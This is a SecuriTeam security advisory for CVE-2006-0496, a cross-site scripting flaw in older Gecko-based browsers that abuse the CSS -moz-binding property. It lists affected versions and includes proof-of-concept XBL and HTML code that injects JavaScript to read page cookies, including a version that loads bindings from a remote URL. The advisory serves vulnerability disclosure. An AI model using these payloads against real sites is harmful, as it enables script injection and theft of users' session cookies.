Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2006-0496 to a friend New vulnerability? New tool? Tell us	CVE-2006-0496 Gecko Based Browsers -moz-binding XSS     Credit: The information has been provided by Juha-Matti Laurio. The bug report can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=324253 A blog about the vulnerability can be found at: http://community.livejournal.com/lj_dev/708069.html Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2006-0496 Details Check for CVE-2006-0496 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Mozilla Firefox 1.5 and prior  * Mozilla Firefox 1.0 and above  * Netscape version 8.1 and prior  * Mozilla Suite version 1.7.12 and prior  * Mozilla Seamonkey 1.0 Gecko based browsers uses the CSS option -moz-binding in order to bind XBL code from additional locations including remote hosts. Attackers can use the -moz-binding option in order to inject Javascript code and to perform a cross site scripting attack from remote location. Proof of Concept: Cookie reading: < !--  this must be served with Content-type: text/xml or similar -- > < bindings>   < binding id="exploit">     < implementation>        < constructor>           //                 function exploitMe( element ) {                     element.innerHTML = "Attempting to read cookie data...";                     var data;                     try {                         data = document.cookie || "No cookie data.";                     } catch( e ) {                         data = "Unable to read cookie."                     }                     element.innerHTML = data;                     element.style.color = "green";                 }                 exploitMe( this );                 //    < / constructor>   < / implementation>  < / binding> < / bindings> Remote loading of script file: < ! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> < html xmlns="http://www.w3.org/1999/xhtml">     < head>         < meta http-equiv="Content-Type" content="text/html; charset=utf-8" />         < title>Cookie Exploit< /title>     < / head>     < body>         < h1>Cookie Exploit using CSS< / h1>         < p style="color: red; -moz-binding: url(https://bugzilla.mozilla.org/attachment.cgi?id=209238#exploit); behavior: url(https://bugzilla.mozilla.org/attachment.cgi?id=209240);">             This is a paragraph with inline exploit CSS.             The CSS executes JavaScript that can read cookies.         < / p>     < / body> < / html> CVE Information: CVE-2006-0496 Disclosure Timeline: 1-Feb-2006 - Vulnerability researched and confirmed 2-Feb-2006 - Detailed research 2-Feb-2006 - Vendor contacted 2-Feb-2006 - Security companies and several CERT units contacted  Comments on CVE-2006-0496:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®